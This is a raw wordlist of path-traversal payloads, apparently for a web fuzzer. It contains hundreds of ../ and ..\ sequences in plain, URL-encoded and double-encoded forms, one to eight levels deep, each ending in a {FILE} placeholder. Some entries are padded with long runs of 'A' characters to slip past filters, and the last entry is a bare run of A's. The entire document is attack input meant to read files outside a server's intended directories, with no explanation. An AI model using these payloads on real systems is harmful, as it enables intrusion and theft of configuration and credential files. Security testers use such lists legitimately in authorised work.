-%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -..%255c{FILE} -..%255c..%255c{FILE} -..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -%252e%252e\{FILE} -%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -../{FILE} -../../{FILE} -../../../{FILE} -../../../../{FILE} -../../../../../{FILE} -../../../../../../{FILE} -../../../../../../../{FILE} -../../../../../../../../{FILE} -..%2f{FILE} -..%2f..%2f{FILE} -..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -%2e%2e/{FILE} -%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -..%252f{FILE} -..%252f..%252f{FILE} -..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -%252e%252e/{FILE} -%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -..\{FILE} -..\..\{FILE} -..\..\..\{FILE} -..\..\..\..\{FILE} -..\..\..\..\..\{FILE} -..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\..\{FILE} -..%5c{FILE} -..%5c..%5c{FILE} -..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -%2e%2e\{FILE} -%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -..%255c{FILE} -..%255c..%255c{FILE} -..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -%252e%252e\{FILE} -%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -\../{FILE} -\../\../{FILE} -\../\../\../{FILE} -\../\../\../\../{FILE} -\../\../\../\../\../{FILE} -\../\../\../\../\../\../{FILE} -\../\../\../\../\../\../\../{FILE} -\../\../\../\../\../\../\../\../{FILE} -/..\{FILE} -/..\/..\{FILE} -/..\/..\/..\{FILE} -/..\/..\/..\/..\{FILE} -/..\/..\/..\/..\/..\{FILE} -/..\/..\/..\/..\/..\/..\{FILE} -/..\/..\/..\/..\/..\/..\/..\{FILE} -/..\/..\/..\/..\/..\/..\/..\/..\{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE} -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA